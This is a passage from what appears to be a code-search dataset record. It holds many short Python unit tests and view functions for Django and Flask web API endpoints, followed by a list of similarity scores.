self.assertEqual(response['Content-Type'] == 'application/json', True)\n self.assertEqual(bool(response.content), True)", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as function (get, post, put, delete)',\n 'Is similar to a traditional Django view',\n 'Gives you the most control over you application logic',\n 'Is mapped manually to URLs',\n ]\n\n return Response({'message':'Hello', 'an_view':an_apiview})", "def test_view(self):\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_week.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_week')\n self.is_postable(data={'previous': True}, to_url_name='calendar_week')\n self.is_postable(data={'today': True}, to_url_name='calendar_week')\n\n resp = self.is_callable(ajax=True)\n self.assertEqual(\n resp.template_name[0], 'calendarium/partials/calendar_week.html',\n msg=('Returned the wrong template for AJAX request.'))\n self.is_not_callable(kwargs={'year': self.year, 'week': '60'})", "def test_swagger(self):\n response = self.client.get(\"/api/v1/swagger\", query_string=dict(validate_schema=True))\n assert_that(response.status_code, is_(equal_to(200)))\n swagger = loads(response.get_data().decode(\"utf-8\"))\n # we have the swagger docs endpoint too, which is implemented as a query.\n # ignore it here for now.\n del swagger[\"paths\"][\"/swagger/docs\"]\n assert_that(swagger[\"paths\"], is_(equal_to({\n \"/foo/get\": {\n \"get\": {\n \"description\": \"My doc string\",\n \"tags\": [\"foo\"],\n \"responses\": {\n \"default\": {\n \"description\": \"An error occurred\", \"schema\": {\n \"$ref\": \"#/definitions/Error\",\n }\n },\n \"200\": {\n \"description\": \"My doc string\",\n \"schema\": {\n \"$ref\": \"#/definitions/QueryResult\",\n }\n }\n },\n \"parameters\": [\n {\n \"in\": \"header\",\n \"name\": \"X-Response-Skip-Null\",\n \"required\": False,\n \"type\": \"string\",\n \"description\": \"Remove fields with null values from the response.\"\n },\n {\n \"required\": False,\n \"type\": \"string\",\n \"name\": \"optional_value\",\n \"in\": \"query\",\n },\n {\n \"required\": True,\n \"type\": \"string\",\n \"name\": \"required_value\",\n \"in\": \"query\",\n },\n ],\n \"operationId\": \"query\",\n }\n }\n })))", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")", "def test_all_endpoint_status():\n r = client.get('/openapi.json')\n assert r.status_code == 200\n for e in r.json()['paths'].keys():\n r = client.get(e)\n assert r.status_code == 200\n\n for e in ['plot']:\n r = 
client.get(e)\n assert r.status_code == 200", "def view_function(*args, **kwargs):\n\n res = {}\n status = 200\n\n try:\n from apis import apis\n url_rule = request.url_rule.rule\n apis_keys = [a[1:] for a in apis.keys()]\n url_rule_splitted = [a for a in url_rule.split(\"/\") if a in apis_keys]\n blueprint = url_rule_splitted[-1]\n blueprint = \"/\" + blueprint\n\n controller_function = apis[blueprint].functions[url_rule]\n res, status = controller_function(args, kwargs, request=request)\n\n except Exception as exc:\n # TODO: log error\n print(exc)\n\n res['error'] = True\n status = 400\n\n return res, status", "def test_view_response_via_url(self):\n request = self.factory.get(reverse('homepage'))\n\n response = HomePageView.as_view()(request)\n\n # Check that 200 is returned as status code\n self.assertEquals(response.status_code, 200)", "def overview():\n return render_template('api/api.html', title='API Overview')", "def test_open_api(self):\n response = self.client.get(self.initiatives_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_index_view(self):\n response = self.client.get(url_for('main.index'))\n self.assertEqual(response.status_code, 200)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def test_api(self):\n new_route = self.route.api(\"new\")\n assert new_route != self.route\n assert new_route.route[\"api\"] == \"new\"", "def call(self) -> global___Snippet.ClientCall:", "def call(self) -> global___Snippet.ClientCall:", "def test_dashboards_v2_request_access(self):\n pass", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions (get,post,patch,put,delete)',\n 'Is similar to a traditional django view',\n 'Gives you the most control over the applicaton logic',\n 'Is mapped manually to the URLs',\n ]\n return Response({'message': 'get method', 'an_apiview': an_apiview})", "def test_view(self):\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_day.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_day')\n self.is_postable(data={'previous': True}, to_url_name='calendar_day')\n self.is_postable(data={'today': True}, to_url_name='calendar_day')\n self.is_not_callable(kwargs={'year': self.year, 'month': '14',\n 'day': self.day})", "def test_get_model_list():\n with app.test_client() as c:\n response = 
c.get('/REST/api/v1.0/model_list') \n assert response.status_code == 201", "def test_assemble_endpoint_data(self):\n urlparser = UrlParser()\n pattern = self.url_patterns[0]\n\n data = urlparser.__assemble_endpoint_data__(pattern)\n\n self.assertEqual(data['path'], '/a-view/')\n self.assertEqual(data['callback'], MockApiView)\n self.assertEqual(data['pattern'], pattern)", "def test_main(self):\n path = reverse(\"main\")\n request = RequestFactory().get(path)\n response = index(request)\n assert response.status_code == 200", "def get(self, request, format=None):\n\n an_apiview= [\n 'Uses HTTP methods as functions (get, post, patch, put, delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your logic',\n 'Is mapped manually to URLs',\n 'Douki mohamed',\n ]\n\n return Response({'message': 'Hello Douki!', 'an_apiview': an_apiview})", "def test_gourde_views(self):\n rv = self.app.get(\"/-/\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/threads\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/ready\")\n self.assertEqual(rv.status_code, 200)", "def test_api_use_method_post(self):\n body = Body()\n response = self.client.open(\n '/api/use/{method}/'.format(method='method_example'),\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def View(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_api_redirects_to_docs(self):\n\n\t\twith self.client:\n\t\t\tget_doc = self.client.get('/')\n\t\t\tself.assertTrue(get_doc.status_code == 302)", "def test_detail(self):\n response = self.client.get('/routines/{}/'.format(self.rout1.id))\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['id'], self.rout1.id)", "def test_metadata(self):\n class ExampleView(views.APIView):\n \"\"\"Example view.\"\"\"\n pass\n\n view = ExampleView.as_view()\n response = view(request=request)\n expected = {\n 'name': 'Example',\n 'description': 'Example view.',\n 'renders': [\n 'application/json',\n 'text/html'\n ],\n 'parses': [\n 'application/json',\n 'application/x-www-form-urlencoded',\n 'multipart/form-data'\n ]\n }\n assert response.status_code == status.HTTP_200_OK\n assert response.data == expected", "def view(self):", "def test_connexion_view(self):\n c = Client()\n response = c.get('/connexion/')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_agency_endpoint(client, create_agency_data):\n\n resp = client.get(\"/api/v2/references/agency/1/\")\n assert resp.status_code == status.HTTP_200_OK\n\n assert resp.data[\"results\"][\"outlay_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"obligated_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"budget_authority_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"congressional_justification_url\"] == \"test.com/cj\"\n assert resp.data[\"results\"][\"current_total_budget_authority_amount\"] == \"2000.00\"\n\n # check for bad request due to missing params\n resp = client.get(\"/api/v2/references/agency/4/\")\n assert resp.data == {\"results\": {}}", "def test_index(self):\n tester = app.test_client(self) # You can use self.app in place of tester\n 
response = tester.get('/', content_type='html/text')\n self.assertEqual(response.status_code, 200)", "def test_index(self):\n tester = app.test_client(self)\n response = tester.get(\"/\")\n self.assertEqual(response.status_code,200)\n assert b\"Moscow Ring Road Distance Finder\" in response.data\n assert b\"search address\" in response.data", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_view(self):\n response = self.client.get('/plugin/sample/ho/he/')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.content, b'Hi there testuser this works')", "def test_index():\n result = views.index(testing.DummyResource(), testing.DummyRequest())\n\n # Pyramid's host url defaults to http://example.com\n host = 'http://example.com'\n links = result['links']\n assert links['annotation']['create']['method'] == 'POST'\n assert links['annotation']['create']['url'] == host + '/annotations'\n assert links['annotation']['delete']['method'] == 'DELETE'\n assert links['annotation']['delete']['url'] == host + '/annotations/:id'\n assert links['annotation']['read']['method'] == 'GET'\n assert links['annotation']['read']['url'] == host + '/annotations/:id'\n assert links['annotation']['update']['method'] == 'PUT'\n assert links['annotation']['update']['url'] == host + '/annotations/:id'\n assert links['search']['method'] == 'GET'\n assert links['search']['url'] == host + '/search'", "def test_officer_access(self):\n self.client.login(self.officer.email)\n for url in self.urls_get:\n response = self.client.get(url, follow=False)\n self.assertEqual(200, response.status_code)\n for url in self.urls_post:\n response = self.client.post(url['url'], url['data'], follow=True)\n self.assertEquals(200, response.status_code)", "def test_uses_wraps(self):\n @self.actions(\"ctx_name\", [])\n def myview(request, some_id):\n \"\"\"docstring\"\"\"\n\n self.assertEqual(myview.func_name, \"myview\")\n self.assertEqual(myview.func_doc, \"docstring\")", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_show_introduction(self):\n # test say hello\n user = {'id':123, 'username':'test_user'}\n result = self.datacenter.show_introduction(user)\n\n self.assertEqual(\n result['response_function'],\n 'send_poll'\n )\n\n # test after vote\n data = {'selected_option': 'Feedback'}\n self.datacenter.talks[123] = {}\n result = self.datacenter.show_introduction(user, data, is_response=True)\n self.assertEqual(result['response_function'],'feedback')", "def test_response_200_on_get(self):\n pass", "def test_request_views(self):\n user = User.objects.get(pk=1)\n url_names = [\n 
['private_requests', {}],\n ['sent_private_requests', {}],\n ['public_requests', {}],\n ['public_applications', {}],\n ['request_write', {}],\n ['request_write', {'username':user.username}],\n ['public_band_request', {}],\n ['request_appy_to_band', {'request_id':1}],\n ]\n\n for url_name in url_names:\n response = self.client.get(reverse(url_name[0], kwargs=url_name[1]))\n self.assertEqual(response.status_code, 302)\n\n self.client.post(reverse('login'),\n data={'identification': '[email protected]',\n 'password': 'blowfish'})\n for url_name in url_names:\n response = self.client.get(reverse(url_name[0], kwargs=url_name[1]))\n self.assertEqual(response.status_code, 200)", "def test_mocked_get_api(self):\n c = Client()\n response = c.get(\"/apimock/mocked/api/account/154/\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response.content)\n response2 = c.get(\"/apimock/mocked/api/account/187/\")\n self.assertEqual(response2.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response2.content)", "def test_detail(self):\n # Test detail URL using ad_guid.\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test URL using email also.\n url = '/api/users/{}/'.format(self.user1.email.lower())\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def test_api_urls():\n # Test the status message - 404 not good , 200 good\n assert API_RH.create_req().status_code == 200, \"The tests for URLs were successful\"" ]
[ "0.6804205", "0.65882033", "0.6567295", "0.6547328", "0.6524265", "0.64814574", "0.6474007", "0.6394351", "0.6393633", "0.6392588", "0.6389973", "0.62900865", "0.62861174", "0.62557405", "0.62550545", "0.6218095", "0.61950505", "0.61669517", "0.61537933", "0.6125932", "0.6122042", "0.61097145", "0.61054593", "0.6094031", "0.6087082", "0.608544", "0.6082286", "0.6073124", "0.60656184", "0.60597664", "0.60544556", "0.60521287", "0.6027421", "0.6017153", "0.6010231", "0.6009154", "0.5994922", "0.5992891", "0.5992315", "0.59840107", "0.5983212", "0.5983212", "0.5979968", "0.5976745", "0.59712815", "0.59610325", "0.5942957", "0.5940497", "0.5935404", "0.59316516", "0.59256685", "0.5913199", "0.5905215", "0.59025735", "0.59017545", "0.5897542", "0.58922374", "0.589193", "0.58905953", "0.5889708", "0.5880618", "0.5873864", "0.5870475", "0.58651286", "0.5863064", "0.5856253", "0.5856253", "0.5854883", "0.5851133", "0.5841043", "0.58405495", "0.5833263", "0.58314776", "0.58286947", "0.5823139", "0.58156115", "0.580827", "0.58045864", "0.58012956", "0.58007365", "0.58001494", "0.5799902", "0.5797075", "0.5797075", "0.57899016", "0.57873267", "0.5784846", "0.5776723", "0.5776723", "0.5764936", "0.5762085", "0.57594174", "0.5755052", "0.5754132", "0.5747267", "0.57447803", "0.5739847", "0.573893", "0.5734626", "0.5733204" ]
0.7911585
0
Test POSTing a start and a stop registry and expect to get it at the Call API Endpoint. Test uses start_call_fx fixture. Test uses stop_call_fx fixture.
def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx, stop_call_fx): post_url = reverse_lazy('calls:registry-list') post_data = [start_call_fx, stop_call_fx] for data in post_data: response = client.post(post_url, data, content_type='application/json') assert response.status_code == status.HTTP_201_CREATED get_url = reverse_lazy('calls:call-list') response = client.get(get_url) assert len(response.data) == 1 assert response.data[0].get('start_timestamp') assert response.data[0].get('stop_timestamp')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": 
\"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, 
endpoint_data['name'])", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": \"3.3.3.3\"}})", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, 
mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the 
deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_get_run(self):\n pass", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n 